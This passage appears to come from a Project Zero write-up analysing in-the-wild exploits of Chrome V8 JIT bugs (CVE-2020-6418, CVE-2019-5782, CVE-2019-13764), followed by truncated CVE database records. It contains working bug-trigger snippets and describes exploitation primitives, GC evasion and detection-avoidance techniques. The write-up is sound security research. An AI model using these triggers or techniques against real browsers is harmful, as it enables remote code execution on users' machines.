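      // Wrong map at pop time: a kept check deopts, an eliminated one confuses types.
      return node.needsCheck ? 'deopt' : 'type-confusion';
    }
  }
  return 'ok';
}

// Array.prototype.pop.call(array) after `var temp = array[0]`: one CheckMaps
// before the JSCreate and nothing between the JSCreate and the pop.
const callTrigger = [
  { op: 'CheckMaps', receiver: 'array', maps: ['PACKED_SMI'] },
  { op: 'JSCreate', newTarget: 'proxy' },
  { op: 'ArrayPop', receiver: 'array' },
];

// array.pop(): the property read inserts a second CheckMaps after the JSCreate.
const directTrigger = [
  { op: 'CheckMaps', receiver: 'array', maps: ['PACKED_SMI'] },
  { op: 'JSCreate', newTarget: 'proxy' },
  { op: 'CheckMaps', receiver: 'array', maps: ['PACKED_SMI'] },
  { op: 'ArrayPop', receiver: 'array' },
];

// Compile and run one shape of trigger with the given new_target kind.
function outcome(chain, fixed, newTarget) {
  const withTarget = chain.map(n => (n.op === 'JSCreate' ? { ...n, newTarget } : n));
  return run(compile(withTarget, fixed), { array: 'PACKED_SMI' });
}

console.log(outcome(callTrigger, false, 'proxy'));    // type-confusion (the bug)
console.log(outcome(callTrigger, true, 'proxy'));     // deopt (patched)
console.log(outcome(directTrigger, false, 'proxy'));  // deopt (extra map check)
console.log(outcome(callTrigger, false, 'function')); // ok (no transition)
```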
[The one-line patch](<https://chromium.googlesource.com/v8/v8.git/+/fb0a60e15695466621cf65932f9152935d859447>) modified the vulnerable function to mark the result of the map inference as unreliable whenever it encounters a JSCreate node:

```diff
InferReceiverMapsResult NodeProperties::InferReceiverMapsUnsafe(
[...]
InferReceiverMapsResult result = kReliableReceiverMaps;
[...]
case IrOpcode::kJSCreate: {
if (IsSame(receiver, effect)) {
base::Optional<MapRef> initial_map = GetJSCreateMap(broker, receiver);
if (initial_map.has_value()) {
*maps_return = ZoneHandleSet<Map>(initial_map->object());
return result;
}
// We reached the allocation of the {receiver}.
return kNoReceiverMaps;
}
+ result = kUnreliableReceiverMaps; // JSCreate can have side-effect.
break;
}
[...]
```

The reader can refer to [the blog post](<https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping-chrome/>) published by Exodus Intel for more details on the issue and their version of the exploit.

#### Exploit 1

This time there’s no embedded list of supported browser versions; the appropriate constants for Chrome 60-63 are determined on the server side.

The exploit takes a rather exotic approach: it only implements a function for the confusion in the double -> tagged direction, i.e. the fakeobj primitive, and takes advantage of a side effect in pop to leak a pointer to the internal hole object. The function pop overwrites the “popped” value with the hole, but due to the same confusion it writes a pointer instead of the special bit pattern for double arrays.

The exploit uses the leaked pointer and fakeobj to implement a data leak primitive that can “survive” garbage collection.
First, it acquires references to two other internal objects, the class_start_position and class_end_position private [symbols](<https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Symbol>), owing to the fact that the offset between them and the hole is fixed. Private symbols are special identifiers used by V8 to store hidden properties inside regular JS objects. In particular, the two symbols refer to the start and end substring indices in the script source that represent the body of a class. When JSFunction::ToString is invoked on the class constructor and builds the substring, it performs no bounds checks on the “trustworthy” indices; therefore, the attacker can modify them to leak arbitrary chunks of data in the V8 heap.

The obtained data is scanned for values required to craft a fake typed array: maps, fixed arrays, backing store pointers, etc. This approach allows the attacker to construct a perfectly valid fake object. Since the object is located in a memory region outside the V8 heap, the exploit also has to create a fake MemoryChunk header and marking bitmap to force the garbage collector to skip the crafted objects and, thus, avoid crashes.

Finally, the exploit overwrites the code of a JIT-compiled function with a payload and executes it.

The author has implemented extensive sanity checking. For example, the data leak primitive is reused to verify that the garbage collector hasn’t moved critical objects. In case of a failure, the worker with the exploit gets terminated before it can cause a crash.
Quite impressively, even when we manually put GC invocations into critical sections of the exploit, it was still able to exit gracefully most of the time.

The exploit employs an interesting technique to detect whether the trigger function has been JIT-compiled:

```javascript
jit_detector[Symbol.toPrimitive] = function() {
  var stack = (new Error).stack;
  // Once TurboFan has inlined Number, its frame no longer shows up in the trace.
  if (stack.indexOf("Number (") == -1) {
    jit_detector.is_compiled = true;
  }
};

function trigger(array, proxy) {
  if (!jit_detector.is_compiled) {
    Number(jit_detector);  // invokes the toPrimitive hook above
  }
  [...]
```

During compilation, TurboFan inlines the builtin function Number. This change is reflected in the JS call stack. Therefore, the attacker can scan a stack trace from inside a function that Number invokes to determine the compilation state.

The exploit was broken in Chrome 64 by [the change](<https://chromium.googlesource.com/v8/v8/+/52ab610bd13>) that encapsulated both class body indices in a single internal object. Although the change only affected a minor detail of the exploit and had an obvious workaround, which is discussed below, the actor decided to abandon this 0-day and switch to an exploit for CVE-2019-5782. This observation suggests that the attacker was already aware of the third vulnerability around the time Chrome 64 came out, i.e. it was also used as a 0-day.

#### Exploit 2

After CVE-2019-5782 became unexploitable, the actor returned to this vulnerability. However, in the meantime, [another commit](<https://chromium.googlesource.com/v8/v8/+/ccbbdb93a1c6f38422097738a830c137576d92fd>) landed in Chrome that stopped TurboFan from trying to optimize builtins invoked via Function.prototype.call or similar functions.
Therefore, the trigger function had to be updated:

```javascript
function trigger(new_target) {
  function inner(new_target) {
    // The callee array.pop is loaded (and the array's map checked) before the
    // argument expression is evaluated, so the JSCreate now follows that check.
    popped = array.pop(
        Reflect.construct(function() { }, arguments, new_target));
  }
  inner(new_target);
}
```

By making the result of Reflect.construct an argument to the pop call, the attacker can move the corresponding JSCreate node after the map check induced by the property load.

The new exploit also has a modified data leak primitive. First, the attacker no longer relies on the side effect in pop to get an address on the heap and reuses the type confusion to implement the addrof function. Because the exploit doesn’t have a reference to the hole, it obtains the address of the builtin asyncIterator symbol instead, which is accessible to user scripts and also stored next to the desired class_positions private symbol.

The exploit can’t modify the class body indices directly as they’re not regular properties of the object referenced by class_positions. However, it can replace the entire object, so it generates an extra class with a much longer constructor string and uses it as a donor.

This version targets Chrome 68-72. It was broken by [the commit](<https://chromium.googlesource.com/v8/v8.git/+/f7aa8ea00bbf200e9050a22ec84fab4f323849a7%5E%21/>) that enabled the W^X protection for JIT regions. Again, given that there are still similar RWX mappings in the renderer related to WebAssembly, the exploit could have been easily fixed. The attacker, nevertheless, decided to focus on an exploit for CVE-2019-13764 instead.

#### Exploit 3 & 4

The actor returned once again to this vulnerability after CVE-2019-13764 got fixed. The new exploit bypasses the W^X protection by replacing a JIT-compiled JS function with a WebAssembly function as the overwrite target for code execution.
That’s the only significant change made by the author.

Exploit 3 is the only one we’ve discovered on the Windows server, and Exploit 4 is essentially the same exploit adapted for Android. Interestingly, it only appeared on the Android server after the fix for the vulnerability came out. Many numeric and string literals were updated, and the pop call in the trigger function was replaced with a shift call. The actor likely attempted to avoid signature-based detection with those changes.

The exploits were used against Chrome 78-79 on Windows and 78-80 on Android until the vulnerability finally got patched.

[The public exploit](<https://blog.exodusintel.com/wp-content/uploads/2020/05/exp.zip>) presented by Exodus Intel takes a completely different approach and abuses the fact that double and tagged pointer elements differ in size. When the same bug is applied against the function Array.prototype.push, the backing store offset for the new element is calculated incorrectly and, therefore, arbitrary data gets written past the end of the array. In this case the attacker doesn’t have to craft fake objects to achieve arbitrary read/write, which greatly simplifies the exploit. However, on 64-bit systems, this approach can only be used starting from Chrome 80, i.e. the version that introduced the [pointer compression](<https://v8.dev/blog/pointer-compression>) feature. While Chrome still runs in the 32-bit mode on Android in order to reduce memory overhead, user agent checks found in the exploits indicate that the actor also targeted (possibly 64-bit) webview processes.

### 3. CVE-2019-5782

#### The vulnerability

CVE-2019-5782 is an issue in TurboFan’s typer module. During compilation, the typer infers the possible type of every node in a function graph using a set of rules imposed by the language.
Subsequent optimization passes rely on this information and can, for example, eliminate a security-critical check when the predicted type suggests the check would be redundant. A mismatch between the inferred type and the actual value can, therefore, lead to security issues.

Note that in this context, the notion of type is quite different from, for example, C++ types. A TurboFan type can be represented by a range of numbers or even a specific value. For more information on typer bugs please refer to the [previous post](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>).

In this case an incorrect type is produced for the expression arguments.length, i.e. the number of arguments passed to a given function. The compiler assigns it the integer range [0; 65534], which is valid for a regular call; however, the same limit is not enforced for Function.prototype.apply. The mismatch was abused by the attacker to eliminate a bounds check and access data past the end of the array:

```javascript
var oob_index = 100000;

function trigger() {
  let array = [1.1, 1.1];
  let index = arguments.length;
  index = index - 65534;       // typed as [-65534; 0] under the bad assumption
  index = Math.max(index, 0);  // ... and thus as [0; 0], so the bounds check is dropped
  return array[index] = 2.2;
}

// Warm up with regular calls so that trigger gets optimized.
for (let i = 0; i < 20000; i++) {
  trigger(1,2,3);
}

// apply is not subject to the 65534-argument limit the typer assumed.
print(trigger.apply(null, new Array(65534 + oob_index)));  // d8 builtin
```

Qixun Zhao used the same vulnerability in Tianfu Cup and [reported it to Chrome](<https://bugs.chromium.org/p/chromium/issues/detail?id=906043>) in November 2018. The public report includes a renderer exploit. [The fix](<https://chromium.googlesource.com/v8/v8/+/8e4588915ba7a9d9d744075781cea114d49f0c7b>), which landed in Chrome 72, simply relaxed the range of the length property.

#### The exploit

The discovered exploit targets Chrome 63-67. The exploit flow is a bit unconventional as it doesn’t rely on typed arrays to gain arbitrary read/write.
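Before going into the exploit flow, the range reasoning that makes the bounds check in the trigger above disappear, as an added toy model of the typer. This is illustrative code written for this post, not V8's typer: types are plain [lo, hi] pairs, only the three operations the trigger uses are modelled, and the patched range [0, Infinity] is an assumption standing in for the relaxed limit.

```javascript
// Toy model of TurboFan's range typing for the CVE-2019-5782 trigger.
// Constructed for illustration; not V8 code.

// Range arithmetic for the operations in the trigger function.
const Typer = {
  sub: ([lo, hi], c) => [lo - c, hi - c],
  max: ([lo, hi], c) => [Math.max(lo, c), Math.max(hi, c)],
};

// A load or store `array[index]` needs a bounds check unless the typer can
// prove the whole index range lies inside [0, length).
function needsBoundsCheck(indexType, arrayLength) {
  const [lo, hi] = indexType;
  return !(lo >= 0 && hi < arrayLength);
}

// Compile the trigger body for an array of `arrayLength` elements, given the
// type the typer assigns to arguments.length.
function compileTrigger(argumentsLengthType, arrayLength) {
  let t = argumentsLengthType;
  t = Typer.sub(t, 65534);  // index = arguments.length - 65534
  t = Typer.max(t, 0);      // index = Math.max(index, 0)
  return { indexType: t, boundsCheck: needsBoundsCheck(t, arrayLength) };
}

// Execute the compiled code with a concrete argument count and report whether
// the store `array[index] = 2.2` stays inside the backing store.
function runTrigger(compiled, actualArgumentsLength, arrayLength) {
  const index = Math.max(actualArgumentsLength - 65534, 0);
  if (index >= 0 && index < arrayLength) return 'ok';
  // Out of range: a kept check deopts; an eliminated one lets the write through.
  return compiled.boundsCheck ? 'deopt' : 'out-of-bounds-write';
}

// Vulnerable typer: arguments.length assumed to lie in [0, 65534], which holds
// for a regular call but not for Function.prototype.apply.
const buggyArgsLength = [0, 65534];
// Patched typer, modelled as an unbounded non-negative range (assumption).
const fixedArgsLength = [0, Infinity];

const ARRAY_LENGTH = 2;    // [1.1, 1.1]
const OOB_INDEX = 100000;  // oob_index from the trigger

// Compile with the given arguments.length type, then run with a concrete count.
function scenario(argsLengthType, actualArgs) {
  const compiled = compileTrigger(argsLengthType, ARRAY_LENGTH);
  return {
    indexType: compiled.indexType,
    boundsCheck: compiled.boundsCheck,
    result: runTrigger(compiled, actualArgs, ARRAY_LENGTH),
  };
}

console.log(scenario(buggyArgsLength, 3));                  // index [0,0], no check, ok
console.log(scenario(buggyArgsLength, 65534 + OOB_INDEX));  // out-of-bounds-write
console.log(scenario(fixedArgsLength, 65534 + OOB_INDEX));  // check kept, deopt
```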
The attacker makes use of the fact that V8 allocates objects in the new space linearly to precompute inter-object offsets. The vulnerability is only triggered once to corrupt the length property of a tagged pointer array. The corrupted array can then be used repeatedly to overwrite the elements field of an unboxed double array with an arbitrary JS object, which gives the attacker raw access to the contents of that object. It’s worth noting that this approach doesn’t even require performing manual pointer arithmetic. As usual, the exploit finishes by overwriting the code of a JS function with the payload.

Interestingly, this is the only exploit that doesn’t take advantage of running inside a web worker even though the vulnerability is fully compatible. Also, the amount of error checking is significantly smaller than in the previous exploits. The author probably assumed that the exploitation primitive provided by the issue was so reliable that all additional safety measures became unnecessary. Nevertheless, during our testing, we did occasionally encounter crashes when one of the allocations that the exploit makes managed to trigger garbage collection. That said, such crashes were indeed quite rare.

As the reader may have noticed, the exploit had stopped working long before the issue was fixed. The reason is that [one of the hardening patches](<https://chromium.googlesource.com/v8/v8.git/+/f53dfd934df0c95e1a82680ce87f48b5d60902d1%5E%21/>) against speculative side-channel attacks in V8 broke the bounds check elimination technique used by the exploit.
The protection was soon turned off for desktop platforms and replaced with [site isolation](<https://www.chromium.org/Home/chromium-security/site-isolation>); hence, [the public exploit](<https://bugs.chromium.org/p/chromium/issues/detail?id=906043>), which employs the same technique, was successfully used against Chrome 70 on Windows during the competition.

The public and private exploits have little in common apart from the bug itself and the BCE technique, which has been commonly known [since at least 2017](<https://bugs.chromium.org/p/chromium/issues/detail?id=762874>). The public exploit turns out-of-bounds access into a type confusion and then follows the older approach, which involves crafting a fake array buffer object, to achieve code execution.

### 4. CVE-2019-13764

This more complex typer issue occurs when TurboFan doesn’t reflect the possible NaN value in the type of an induction variable. The bug can be triggered by the following code:

```javascript
for (var i = -Infinity; i < 0; i += Infinity) { [...] }
```

This vulnerability and the exploit for Chrome 73-79 have been discussed in detail in [the previous blog post](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html>). There’s also an earlier version of the exploit targeting Chrome 69-72; the only difference is that the newer version switched from a JS JIT function to a WASM function as the overwrite target.

The comparison with the exploit for the previous typer issue (CVE-2019-5782) is more interesting, though. The developer put much greater emphasis on the stability of the new exploit even though the two vulnerabilities are identical in this regard. The web worker wrapper is back, and the exploit doesn’t corrupt tagged element arrays to avoid GC crashes. Also, it no longer relies completely on precomputed offsets between objects in the new space.
For example, to leak a pointer to a JS object the attacker puts it between marker values and then scans the memory for the matching pattern. Finally, the number of sanity checks is increased again.

It’s also worth noting that the new typer bug exploitation technique worked against Chrome on Android despite the side-channel attack mitigation and could have “revived” the exploit for CVE-2019-5782.

### Conclusion

The timeline data and incremental changes between different exploit versions suggest that at least three out of the four vulnerabilities (CVE-2020-6418, CVE-2019-5782 and CVE-2019-13764) have been used as 0-days.

It is no secret that exploit reliability is a priority for high-tier attackers, but our findings demonstrate the amount of resources the attackers are willing to spend on making their exploits extra reliable, especially the evidence that the actor has switched from an already high-quality 0-day to a slightly better vulnerability twice.

The area of JIT engine security has received great attention from the wider security community over the last few years. In 2015, when Chrome 37 came out, the exploit for CVE-2017-5070 would be considered quite ahead of its time. In contrast, if we don’t take into account the stability aspect, the exploit for the latest typer issue is not very different from exploits that enthusiasts made for JavaScript challenges at CTF competitions in 2019. This attention also likely affects the average lifetime of a JIT vulnerability and, therefore, may force attackers to move to different bug classes in the future.

This is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild.
To continue reading, see [In The Wild Part 4: Android Exploits](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-exploits.html>).
"impactScore": 5.9}, "published": "2019-12-10T00:00:00", "type": "ubuntucve", "title": "CVE-2019-13764", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13764"], "modified": "2019-12-10T00:00:00", "id": "UB:CVE-2019-13764", "href": "https://ubuntu.com/security/CVE-2019-13764", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T13:55:39", "description": "Type confusion in V8 in Google Chrome prior to 59.0.3071.86 for Linux,\nWindows, and Mac, and 59.0.3071.92 for Android, allowed a remote attacker\nto execute arbitrary code inside a sandbox via a crafted HTML page.\n\n#### Bugs\n\n * <https://crbug.com/722756>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mikesalvatore](<https://launchpad.net/~mikesalvatore>) | The Ubuntu Security Team does not support libv8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-10-27T00:00:00", "type": "ubuntucve", "title": "CVE-2017-5070", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, 
"cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070"], "modified": "2017-10-27T00:00:00", "id": "UB:CVE-2017-5070", "href": "https://ubuntu.com/security/CVE-2017-5070", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-03T13:51:08", "description": "Type confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a\nremote attacker to potentially exploit heap corruption via a crafted HTML\npage.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[alexmurray](<https://launchpad.net/~alexmurray>) | The Debian chromium source package is called chromium-browser in Ubuntu\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-27T00:00:00", "type": "ubuntucve", "title": "CVE-2020-6418", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": 
"2020-02-27T00:00:00", "id": "UB:CVE-2020-6418", "href": "https://ubuntu.com/security/CVE-2020-6418", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T13:42:30", "description": "Incorrect optimization assumptions in V8 in Google Chrome prior to\n72.0.3626.81 allowed a remote attacker to execute arbitrary code inside a\nsandbox via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-02-19T00:00:00", "type": "ubuntucve", "title": "CVE-2019-5782", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-5782"], "modified": "2019-02-19T00:00:00", "id": "UB:CVE-2019-5782", "href": "https://ubuntu.com/security/CVE-2019-5782", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-31T19:21:34", "description": "Type confusion in JavaScript in Google Chrome prior to 79.0.3945.79 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", 
"scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-10T22:15:00", "type": "cve", "title": "CVE-2019-13764", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13764"], "modified": "2022-03-31T17:26:00", "cpe": ["cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/a:suse:package_hub:-", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:debian:debian_linux:9.0", "cpe:/o:debian:debian_linux:10.0", "cpe:/o:fedoraproject:fedora:31", "cpe:/a:opensuse:backports_sle:15.0", "cpe:/o:fedoraproject:fedora:30", "cpe:/o:redhat:enterprise_linux_workstation:6.0"], "id": "CVE-2019-13764", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13764", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:suse:package_hub:-:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", 
"cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-04-06T21:33:39", "description": "Type confusion in V8 in Google Chrome prior to 59.0.3071.86 for Linux, Windows, and Mac, and 59.0.3071.92 for Android, allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-10-27T05:29:00", "type": "cve", "title": "CVE-2017-5070", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070"], "modified": "2022-04-06T19:26:00", "cpe": ["cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:redhat:enterprise_linux_workstation:6.0"], "id": "CVE-2017-5070", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5070", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-31T19:21:07", "description": "Type 
confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-27T23:15:00", "type": "cve", "title": "CVE-2020-6418", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": "2022-03-31T17:12:00", "cpe": ["cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:debian:debian_linux:9.0", "cpe:/o:fedoraproject:fedora:31", "cpe:/o:debian:debian_linux:10.0", "cpe:/o:fedoraproject:fedora:30", "cpe:/o:redhat:enterprise_linux_workstation:6.0"], "id": "CVE-2020-6418", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-6418", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", 
"cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T23:52:05", "description": "Incorrect optimization assumptions in V8 in Google Chrome prior to 72.0.3626.81 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-02-19T17:29:00", "type": "cve", "title": "CVE-2019-5782", "cwe": ["CWE-787", "CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-5782"], "modified": "2021-07-21T11:39:00", "cpe": 